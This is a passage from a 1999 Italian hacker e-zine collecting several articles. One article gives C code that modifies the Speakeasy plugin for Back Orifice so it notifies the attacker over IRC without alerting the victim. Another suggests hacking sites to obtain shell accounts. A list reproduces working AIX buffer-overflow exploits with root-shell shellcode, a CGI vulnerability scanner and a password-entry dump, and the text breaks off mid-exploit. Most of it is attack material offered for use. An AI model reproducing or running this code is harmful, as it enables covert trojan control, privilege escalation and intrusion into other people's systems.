siamo mooolto fortunati possiamo anche eseguire finger non solo
sugli utenti ma anche su questi programmi, che vengono definiti
demoni.
Provate infatti a fare qualche tentativo del tipo
finger system@host.it
finger ftp@host.it
finger bin@host.it
ecc ecc
(e qui entra in gioco l'exploit, ma questo e' un altro discorso
hehehe).

Ok, anche questo a' finito.
Un grazie a N0bodY88 sia per avermi dato la possibilita' di
scrivere su questa e-zine che promette molto bene, sia per aver
scelto un nick che ogni volta ci metto almeno 5 secondi per
scrivere correttamente eheheheh... ciao ciao

fritz

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

#########################################################
# #
# Come modificare speakeasy per non essere beccati #
# #
# 15-2-99 by Meew <meew@beer.com> #
# #
#########################################################


/////////////////////////////////////////////////////////
// Classico Disclaimer con qualcosa in piu'(leggere pliz)
/////////////////////////////////////////////////////////

ok, questo serve solo per scopi umanitari, non mi assumo nessuna responsabilita'
per qualsiasi conseguenza derivante dalla lettura di questo documento ecc. ecc.
inoltre vorrei segnalare a tutti i lettori (grandi & piccini ) che io NON SO
programmare in C e che NON GARANTISCO assolutamente che la dll funzioni... l'ho
provata piu' volte e non mi ha mai dato problemi, ma non si sa mai, dato che in
pratica ho sbattuto uno sleep dentro la funzione di inizio...

///////////////////////
//Intro e boiate varie
///////////////////////

ok, bo e' una gran cosa, ma se installato su qualcuno con IP dinamico perde un
po' significato... come facciamo a ribeccare la vittima??
Il signor Brian Enigma enigma@netninja.com ci ha pensato e ha deciso di scrivere
una dll che notificasse la presenza della vittima sul canale #bo_owned di un
server irc scelto da noi.
In questo modo pero' la dll (che si esegue automaticamente grazie al boconfig)
cerca di connettersi a internet a ogni avvio del computer, e continuando ogni
pochi minuti a provarci, facendo apparire continuamente la finestra di
connessione... e facendo quindi insospettire la vittima.
Allora ecco che arriva la parte bella... e se facessimo aspettare la dll finche'
la connessione non si avvia e solo allora le facessimo mandare la notifica?
Ecco come fare

//////////////
//Ingredienti:
//////////////

- un computer con schermo e tastiera
- il codice sorgente di Speakeasy (reperibile a http://www.netninja.com)
- un compilatore c (io ho usato il Visual c++)

Tempo di preparazione: 10 min.
Tempo di cottura: a seconda del forno

////////////////////////
//Preparazione & Cottura
////////////////////////

Allora, innanzi tutto aprite il file speakeasy.c , a un certo punto ci sono una
serie di #include... aggiungete le righe

#include <winreg.h>
#include <TCHAR.H>

appena sotto c'e' la definizione delle funzioni... sotto "void myIP(char
*result);"
aggiungete

int ActiveConnection(); //questo e' il piatto forte!!

Poi ci sono le variabili... aggiungente

int connesso=0;

li sotto c'e' una serie di #define... se non vi va il nome del canale cambiatelo
e cambiatelo anche in tutte le altre occorrenze del progetto...

poi c'e' "const char customMessage[][80]={"DEAD COW!", ecc. , volendo potete
cambiare i messaggi di saluto, ma non usate piu' di 80 caratteri.

ok... molto piu' giu, praticamente alla fine, trovate

__declspec ( dllexport )
char * WINAPI start(int *active, char *args)
{
char *p;
int count;

ok, qui sotto (prima di globalActive = active;) aggiungente le righe seguenti

while (ActiveConnection()==0)
{

Sleep(1000*60*2);

}


ok, a questo punto in fondo a tutto aggiungete questo

//---------begin cut-----------//

int ActiveConnection()
{


TCHAR tszKey[] = _T("
System\\CurrentControlSet\\Services\\RemoteAccess");
HKEY hKey;
DWORD dwDim;
BYTE *pb;
PULONG pippo=0;

long res ;

RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
tszKey,
0,
KEY_ALL_ACCESS,
&hKey
);


RegQueryValueEx(
hKey,
_T("
Remote Connection"),
NULL,
pippo,
NULL,
&dwDim
);



pb = (BYTE *)malloc(dwDim);

res=(RegQueryValueEx
(
hKey,
_T("
Remote Connection"),
NULL,
pippo,
pb,
&dwDim
)
);

RegCloseKey( hKey );

if (res ==0)
{
if(*pb==0)
{

return 0 ;
}
else
{

return 1;
}
}
else
{

return 0;
}
}
//---------end cut-----------//

Ok, a questo punto dovete linkare tutto a Wsock32.lib. (se usate VC++ 5 fate
cosi': andate nel menu project e scegliete settings, poi scegliete la tab link e
aggiungete nella textbox intitolata "
object / library modules" Wsock32.lib)

Compilate e avete finito!

Ora potrete usare la vostra dll come se fosse speakeasy, quindi con gli stessi
parametri ecc. (per tutto questo vi rimando al txt che trovate nel pacchetto
scaricabile da http://www.netninja.com) ma la dll aspettera' il momento giusto
prima di lanciarsi!

////////////////
// Saluti & baci
////////////////

Ne approfitto per salutare la mia mamma e il mio babbo, piu' tutti quelli in
ascolto che mi conoscono, Raf che mi ha aiutato parecchio e il NG ahccc quando
era ancora quello di una volta.
Meew

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ COS'E' E COME SI USA UNA SHELL ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

-----------------< fritz presents.... >-----------------

:shell

Ok... questo argomento lo vedo piu' pertinente al topic che mi era
stato assegnato rispetto a "
finger", ma che volete farci?... sono
OT per natura io ;-)
Quello che voglio fare con questo breve testo e' spiegare' cos'e'
una shell, come procurarsela, come stabilire se e' quella che fa
per noi, e un breve tutorial di livello moooooolto basso.
Piccola premessina: questo articolo e' per newbies al 100%, dubito
che possa servire a chi gia' usa un qualsiasi sistema tipo UNIX,
quindi se siete gia' navigati nell'argomento, molto probabilmente
questo articolo non vi servira' a nulla.
Infatti io stesso mi sono avvicinato al mondo dell'hacking da solo
2 mesi, e questo e' quanto ho scoperto finora.

--| parte 1ø: cos'e' una shell |--

be'... avete presente un qualsiasi terminale *NIX? Ecco, la shell
e' quell'interfaccia, quella che al posto del solito prompt di MS-
DOS o Windows tipo
C:\>_
ci mostra un prompt del tipo
%
oppure
$
oppure
#
Non avete presente questo tipo di interfaccia? Uhmm..allora come
spiegare? Be'... posso dire che con una shell (letteralmente =
guscio) e' come se stesse usando un terminale UNIX, e potete
eseguire molti dei comandi tipici di questo sistema.
Avere una shell e' fondamentale per un hacker non dico che si
rispetti, ma solo che voglia essere considerato tale e non solo un
lamah :-)
Mettiamo il caso infatti che vogliate giocare al piccolo hacker
con un server che avete scoperto, per esempio che usa Apache sotto
UNIX e ha le famigerate estensioni front-page, e non e' per nulla
raro trovare server cosi'.
Allora ricorrete al vostro archivio di exploit preferito, che sia
bugtraq, rootshell o exploit world non importa, e trovate le
indicazioni per sfruttare questo pesante bug che potrebbe darvi i
privilegi di ROOT, ovvero libero accesso a tutti i file con
permesso di lettura e scrittura (ooohhhh... stupore heheheh) Cosa
leggete? Che bisogna non solo usare una shell UNIX, ma anche quale
shell usare, cioe' la Bourne ("
if you use the bastard C-shell it
obviously won't work as written"), figuriamoci se va bene il
prompt di MS-DOS :-))))
Questo perche' bisogna usare dei comandi e scrivere degli script
che gli OS di casa Microsoft non riescono a fare.
E allora cosa facciamo noi bimbi col w95-98? Passiamo al linux
(scelta consigliata eheh) oppure troviamo una shell in giro per
internet.

--| parte 2ø: come procurarsela |--

ehmmm... qua arriva il bello!
In poche parole: e' un casino! :-)
Nel senso che si trovano tranquillamente un po' di shell in giro,
questa per esempio e' la lista pubblicata dallo staff di TheArgon:
-----------
http://www.freeshells.net
http://www.cyberspace.org
http://www.continuum.eu.org
http://dishboy.dyn.ml.org
http://www.nyx.net
http://vester.dyn.ml.org
http://www.vexation.org
http://www.arbornet.org/projects.html
http://www.unixnet.org
http://www.nether.net
http://www.lanck.ru
http://sdf.lonestar.org
http://suburbia.com.au
http://www.nyx.net
http://www.shellyeah.com
-----------
conviene che prima vi facciate un giro per il server web di questi
siti, in modo tale da leggere cosa potete fare sulla shell e come
accedervi.
Ma se siete impazienti, provate subito
Nyx.net:23
cyberspace.org:23
come sarebbe a dire in che modo?
Aprendo un qualsiasi telnet, anche c:\windows\telnet.exe va
benissimo, e digitate nyx.net su Host name, mentre come port e
Term type lasciate le impostazioni di default (telnet e vt100).
Queste shell pero' non aspettatevi che siano il massimo della vita
:-) non credo che tutte lascino girare processi e/o compilare
sorgenti o telnettarsi all'esterno del sito.
Queste vanno solo bene per iniziare a capire come funziona la
storia. Quando sarete un po' piu' smaliziati, potrete cercare la
shell definitiva, magari potrete crearla voi, hackerando un sito e
creando un account per i vostri giochetti ;) .

--| parte 3ø: comandi basilari della shell |--

Be'... sono logicamente comandi UNIX, quindi:
-cd <nome dir> per muoversi nel file system
-ls come il comando "
dir" per dos
-cp <file1> <file2> come il comando "
copy" per dos
-rm <nome file> come il comando "
del" per dos
-mv <file1> <file2> come il comando "
move" per dos
-mkdir <nome dir> come il comando "
md" per dos
-rmdir <nome dir> come il comando "
rd" per dos
-man <comando> fornisce info su quel comando
-more <file> visualizza il file
Questi sono solo i comandi basilari per muoversi.
Per avere un ottimo manuale (naturalmente gratis) fate un salto su
http://www.pippo.com e cercate "
the linux user guide", sono circa
170 pagine molto ben fatte, il classico manuale!
Vivamente consigliato dal fritz per chi vuole un po' imparare ad
usare le shells :-)

--| parte 4ø: come stabilire la bonta' della shell |--

Ovvero come stabilire se quella che avete trovato fa per voi,
soddisfa le vostre esigenze o se invece rappresenta solo un punto
di partenza, ma che poi dovrete abbandonare se vorrete entrare nel
vero mondo degli exploit.
Ecco qui "
ten Meinel Hall of Fame LAN and Internet Exploration
Tools" by Carolyn P. Meinel, ovvero 10 comandi "that you
absolutely must have access to":
----------------
1) telnet <host name> <port number>
fondamentale, se non puoi telnettarti con nessun sistema, "
you are
totally crippled as a hacker" e quindi cercati all'istante
un'altra shell
2) who
mostra quali altri utenti sono connessi
3) netstat
mostra statistiche come per esempio la lista delle connessioni del
server ad internet
4) whois <hostname>
per avere informazioni su un sito internet
5) nslookup
altre info, cosi' come il prossimo comando
6) dig
7) finger
vedi l'altro articolo per l'e-zine :-)
8) ping
per vedere se un sito e' attivo e come e' la connessione a
quell'host (lenta, veloce... ecc)
9) traceroute
traccia il percorso dei vari pacchetti spediti ad un certo host
10) ftp
per eseguire download e upload di files su altri computer.
----------------
Ora sta a voi giudicare la shell che avete appena trovato, se e'
utile oppure da scartare.

--| parte 5ø: breve tutorial di bassissimo livello |--

Ok, allora vediamo un po' come funziona la piu' famose delle varie
shell che sono in giro, ovvero la shell Grex, che trovate
all'indirizzo
Cyberspace.org:23
Allora, per prima cosa vi trovate di fronte al saluto della
macchina, e alla richiesta di login.
Dato che non vi siete mai collegati (o se l'avete fatto, rifatelo,
cosi' almeno leggete anche questa parte dell'articolo eheheheh..)
vi viene chiesto di digitare come
Login: newuser (o qualcosa del genere...)
Ok, adesso siete dentro... vi beccate 'na marea di testo, che cmq
vi consiglio di leggere. Tra le altre cose vi dice cosa potete
fare e cosa non potete fare con Grex: ovvero, non potete usare
telnet, ftp etc (come specificato in "
You will not be able to use
most Internet services (telnet, FTP, etc.)", ma potete scrivere e
ricevere posta, credo (almeno quello! hehehe).
Dopo la pappardella, vi viene chiesto di settare le vostre
preferenze: per prima cosa vi chiede di settare quale combinazione
di tasti volete usare per identificare i tasti "
erase", "kill",
"
interrupt".
Allora da bravi premete alla prima richiesta il tasto BACKSPACE o
CTRL+H, alla seconda CTRL+C e alla terza CTRL+N.
A cosa servono questi tasti? Ok, erase cancella il primo carattere
a sinistra del cursore, kill cancella tutta la riga, interrupt
serve per interrompere un'operazione e tornare quindi al prompt.
La prossima domandina e' che tipo di terminale usi. E qui e'
d'uopo rispondere VT100, il classico terminale UNIX solo testo,
sempre compatibile, che rappresenta il jolly.
Dopodiche' seguiranno domande tipo:
full name:
address:
telephone number:
occupation:
computer equipment:
born:
sex:
interest:
comments:
Naturale che non siete obbligati a scrivere i vostri dati giusti
giusti. Infine chiede se volete rendere pubblici i vostri dati
oppure no.
Segue la scelta della shell, nel senso dell'interprete dei
comandi, la cosa piu' importante, perche' se scegliete una shell
di cui non sapete i comandi... be''...dovrete cambiarla. Fate voi.
Grex consiglia per i principianti la "
bbs", ma io mi trovo con la
"
bash", anche perche' a tempo perso uso Linux :)
Infine dovrete selezionare quale editor di testi vorrete usare.
Consiglio vivamente "
emacs", sia per la sua potenza che per la sua
facilita' d'uso, anche se i vecchi linuxers andranno subito per
"
vi", eheheh... ormai la questione e' prettamente filosofica!
L'ultimo passo: la scelta della login e della pass, e poi siete a
posto, avete la vostra shell, ripeto, che va benissimo per i
vostri primi esperimenti di newbie (e lo siete, altrimenti avreste
saltato a pie' pari quest'articolo eheheh!) ma che poi dovrete
abbandonare per rimpiazzarla con la vostra shell di fiducia che vi
permette i servizi citati nella parte 4ø.


Ecco, sono giunto alla fine, la prossima volta ci potrebbe stare
un articoletto che spiega come mandare mail anonime, post anonimi
sui newsgroup, come usare telnet e servizi associati e cosa potete
fare di carino sfruttando una shell. :-)

Come direbbe il Duka, have fun!

fritz

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ PROGETTO FUCKTEL - TELECOZZ E ALTRE INFO MOLTO UTILI ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Allora premetto che sto progetto e' da poco iniziato e da poco ho ottenuto risulati soddisfacenti
allora partiamo a spiegarlo.
Green una brutta parola per molti [i numeri x collegarsi] e forse anche per me.
Mha prendiamo in considerazione di avere questi strumenti un caro numero PBX e un green carino
da qui nasce il progetto fucktel
Bhe che palle ogni volta fare 100 operazioni x usarli mha forse un caro prog puo' risolevre la sistuzione
e se consideriamo di fare na bella cosa x esempio:
PBX-PBX-NUMERO ci si complica la vita bhe sto facendo un prog carino che risolva il problema
e mi sta aituando per fortuna un mio amico telecom.
Na cosa so per certo che a telecom dal 22marzo molti software verranno aggiornati con alcuni veramente bastardi
, spero [ma forse non sara' cosi'] di poterveli fornire].

NUOVI SOFTWARE LINUX
Allora premetto che non sono uno specialista in tutto cio' ma ho trovato dei prog veramente interessanti da scaricare
prima di tutto e' uscito l' upgrade per la versione del winamp presa in considerazione nel primo numero , su
www.linux.box.sk sono usciti aggiornamenti per gli scanner e per quanto riguarda l' emulazione di windowz , una bellissima
gui che vi consiglio e'il KDE che trovo fantastica io la ho trovata nel cd di inter-net di febbraio insieme alla SuSe 6.0 .
Bha e' stao migliorato il supporto per la versione delle direct x x linux che potete scaricare sempre da www.linux.box.sk.
Bhe anche stavolta ho finito di dirvi le cose che mi interessavano se volete la prossima volta ci dedico + spazio
Ciao ZeroCool

QUESTO MONDO INFINITO DI EXPLOIT
Bhe ho scaricato un bel po' di exploi nuovi di pacco da www.rootshell.com e vi
mando sta mega lista con relative spiegazioni
Allora iniziamo:

WIN98:
I'm not sure about the details of this problem, but when testing another
buffer overflow, I created a long filename called

"
testfile.txt "(note the chr(160)'s at the end) It is 235 characters in length. After
creating it on my desktop, I right clicked on it; explorer crashed saying it
caused an illegal operation. The only way I found to close this was by
using command.com. I sent this to a friend and he got the same error.
Bhe penso che questo lo abbaimo capito tutti se noi facciamo un file con 160
carratteri alla fine causa un operazione illegale e crasha

LINUZ:

/*
There is a buffer overflow in /usr/dt/bin/dtterm and/or
in libXt which spawns a root shell.

Solution: #chmod -s /usr/dt/bin/dtterm ; dtterm seems
to continue working.

Tested on AIX 4.2 RS/6000 box.
*/
/*----cut here---------
AIX 4.2,(others?) dtterm exploit by Georgi Guninski

----------------------------------------
DISCLAIMER

This program is for educational purpose ONLY. Do not use it without
permission. The usual standard disclaimer applies, especially the
fact that Georgi Guninski is not liable for any damages caused by
direct or indirect use of the information or functionality provided
by this program. Georgi Guninski, his employer or any Internet
provider bears NO responsibility for content or misuse of this
program or any derivatives thereof. By using this program you accept
the fact that any damage (dataloss, system crash, system compromise,
etc.) caused by the use of this program is not Georgi Guninski's
responsibility.

In case you distribute this, please keep the disclaimer and my
addresses.
-----------------------------------------
Use the IBM C compiler.
Compile with: cc -g aixdtterm.c
Some brute forcing may help.
DISPLAY should be set to a valid display.
SOLUTION: #chmod -s /usr/dt/bin/dtterm ; dtterm seems to
continue working?
-----------------
Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711

Suggestions,comments and job offers are welcome! 20-MAY-97
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


char prog[100]="
/usr/dt/bin/dtterm"; char prog2[30]="dtterm";
extern int execv();

char *createvar(char *name,char *value) {
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("
error allocating");
exit(2);};
strcpy(c,name);
strcat(c,"
=");
strcat(c,value);
putenv(c);
return c;
}

/*The program*/
main(int argc,char **argv,char **env) {
/*The code*/
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* disassembly
7c0802a6 mfspr r0,LR
9421fbb0 stu SP,-1104(SP) --get stack
90010458 st r0,1112(SP)
3c60f019 cau r3,r0,0xf019 --CTR
60632c48 lis r3,r3,11336 --CTR
90610440 st r3,1088(SP)
3c60d002 cau r3,r0,0xd002 --TOC
60634c0c lis r3,r3,19468 --TOC
90610444 st r3,1092(SP)
3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
6063696e lis r3,r3,26990
90610438 st r3,1080(SP)
3c602f73 cau r3,r0,0x2f73
60636801 lis r3,r3,26625
3863ffff addi r3,r3,-1
9061043c st r3,1084(SP) --terminate with 0
30610438 lis r3,SP,1080
7c842278 xor r4,r4,r4 --argv=NULL
80410440 lwz RTOC,1088(SP)
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/

#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET=0;
int dobuf=0;
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int ch;
unsigned int reta; /* return address */
int corr=1000;
char *args[4];
char *arg1="
-ms";
char *newenv[8];
int startwith=0;

mn=200;
max=300;

if (argc>1) corr = atoi(argv[1]);

pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;

if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) ) {
perror("
Bad parameters");
exit(1);
}

#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) & 0x0000ffff);

reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;

for(nop=0;nop<mn;nop++)
buf[nop]=startwith ? reta : 0x4ffffb82; /*NOP*/
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;

if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
|| !(reta && 0xff000000))
{
perror("
Return address has zero");
exit(5);
}

while(i++<max)
buf[i]=reta;
buf[i]=0;

for(i=0;i<max-1;i++)
frame[i]=reta;
frame[i]=0;

if(QUIET)
{
puts((char*)&buf);
fflush(stdout);
exit(0);
};

/* 4 vars 'cause the correct one should be
aligned at 4bytes boundary */
newenv[0]=createvar("
EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("
EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("
EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("
EGGSHE4",(char*)&buf[0]);

newenv[4]=createvar("
DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;

args[0]=prog2;
args[1]=arg1;
args[2]=(char*)&frame[0]; /* Just frame pointers */
puts("
Start...");/*Here we go*/
execve(prog,args,newenv);
perror("
Error executing execve \n");
/*
Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711
*/
}
/*
-------sometimes this helps-----------------------
#!/bin/ksh
L=20
O=40
while [ $L -lt 12000 ]
do
echo $L
L=`expr $L + 144`
./a.out $L
done
*/

Bhe questo [ma potete anche leggervelo dalla descrizione di da' na shell root.

CGI:


/* [ http://www.rootshell.com/ ] */

/* Tested on Slackware linux with kernel 2.0.35 */

#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>

void main(int argc, char *argv[])
{
int sock,debugm=0;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "
200";
char *cgistr;
char buffer[1024];
int count=0;
int numin;
char cgibuff[1024];
char *buff[50]; /* Don't u think 50 is enought? */
char *cginame[50]; /* Don't u think 50 is enought? */

buff[1] = "
GET /cgi-bin/phf HTTP/1.0\n\n";
buff[2] = "
GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
buff[3] = "
GET /cgi-bin/test-cgi HTTP/1.0\n\n";
buff[4] = "
GET /cgi-bin/php.cgi HTTP/1.0\n\n";
buff[5] = "
GET /cgi-bin/handler HTTP/1.0\n\n";
buff[6] = "
GET /cgi-bin/webgais HTTP/1.0\n\n";
buff[7] = "
GET /cgi-bin/websendmail HTTP/1.0\n\n";
buff[8] = "
GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
buff[9] = "
GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
buff[10] = "
GET /cgi-bin/htmlscript HTTP/1.0\n\n";
buff[11] = "
GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
buff[12] = "
GET /cgi-bin/perl.exe HTTP/1.0\n\n";
buff[13] = "
GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";

cginame[1] = "
phf";
cginame[2] = "
Count.cgi";
cginame[3] = "
test-cgi";
cginame[4] = "
php.cgi";
cginame[5] = "
handler";
cginame[6] = "
webgais";
cginame[7] = "
websendmail";
cginame[8] = "
webdist.cgi";
cginame[9] = "
faxsurvey";
cginame[10] = "
htmlscript";
cginame[11] = "
pfdisplay";
cginame[12] = "
perl.exe";
cginame[13] = "
wwwboard.pl";

if (argc<2)
{
printf("
\nusage : %s host ",argv[0]);
printf("
\n Or : %s host -d for debug mode\n\n",argv[0]);
exit(0);
}

if (argc>2)
{
if(strstr("
-d",argv[2]))
{
debugm=1;
}
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("
gethostbyname");
exit(0);
}

printf("
\n\n\t\t [CKS & Fdisk]'s CGI Checker\n\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("
connect");
}
printf("
\n\n\t [ Press any key to check out the httpd version...... ]\n");
getchar();
send(sock, "
HEAD / HTTP/1.0\n\n",17,0);
recv(sock, buffer, sizeof(buffer),0);
printf("
%s",buffer);
close(sock);
printf("
\n\t [ Press any key to search 4 CGI stuff...... ]\n");
getchar();

while(count++ < 13) /* Change 13 to how many buff[?] u have above */
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("
connect");
}
printf("
Searching for %s : ",cginame[count]);

for(numin=0;numin < 1024;numin++)
{
cgibuff[numin] = '\0';
}

send(sock, buff[count],strlen(buff[count]),0);
recv(sock, cgibuff, sizeof(cgibuff),0);
cgistr = strstr(cgibuff,foundmsg);
if( cgistr != NULL)
printf("
Found !! ;)\n");
else
printf("
Not Found\n");

if(debugm==1)
{
printf("
\n\n ------------------------\n %s \n ------------------------\n",cgibuff);
printf("
Press any key to continue....\n");
getchar();
}
close(sock);
}
}


Bhe i soliti pacchi nelle cgi .... Ottimo

SHADOW:

#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("
%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}

Mha chissa a che serve

AIX:

/*
Hello all

There seem to exist a buffer overflow condition in AIX 4.2/4.1/? when the shell variable LC_MESSAGES is long enough.
/bin/host and /usr/sbin/mount are vulnerable to spawning a root shell.

Solutions:
1) IBM was informed on 972903 and on 970403 wrote the following:
>The APARs are going through the regression test lab right now and should
>be available by next week. Here are the numbers:
> AIX 4.2: APAR IX67377
> AIX 4.1: APAR IX67407
> AIX 3.2: APAR IX67405
2) a little bit ugly, but works:
#chmod -s /bin/host /usr/sbin/mount
3) I have not tested it, but if you are in the mood you may try to change LC_MESSAGES in /usr/lib/libc.a, /usr/lib/ and everywhere else to something unpredictable.

If the C program does not work, try the ksh script which does some brute forcing.

PLEASE NOTE my e-mail addresses bellow and do NOT REPLY to this message.

Georgi Guninski
guninski@hotmail.com
stgun@sgg.vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711

---test2.c----------------------------------------------------------------------
*/
/*
AIX 4.2/4.1 LC_MESSEGAS /usr/sbin/mount exploit by Georgi Guninski

----------------------------------------
DISCLAIMER

This program is for educational purpose ONLY. Do not use it without
permission. The usual standard disclaimer applies, especially the
fact that Georgi Guninski is not liable for any damages caused by
direct or indirect use of the information or functionality provided
by this program. Georgi Guninski, his employer or any Internet
provider bears NO responsibility for content or misuse of this
program or any derivatives thereof. By using this program you
accept the fact that any damage (dataloss, system crash, system
compromise, etc.) caused by the use of this program is not Georgi
Guninski's responsibility.

In case you distribute this, please keep the disclaimer and my addresses.
----------------------------------------- Use the IBM C compiler.
Compile with: cc -g test2.c
-----------------
Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711



Suggestions,comments and job offers are welcome!


22-Mar-97
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


char prog[100]="
/usr/sbin/mount";
char prog2[30]="
mount";
extern int execv();

char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l)))
{
perror("
error allocating");
exit(2);
};
strcpy(c,name);
strcat(c,"
=");
strcat(c,value);
putenv(c);
return c;
}

/*The program*/
main(int argc,char **argv,char **env)
{
/*The code*/
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* disassembly
7c0802a6 mfspr r0,LR
9421fbb0 stu SP,-1104(SP) --get stack
90010458 st r0,1112(SP)
3c60f019 cau r3,r0,0xf019 --CTR
60632c48 lis r3,r3,11336 --CTR
90610440 st r3,1088(SP)
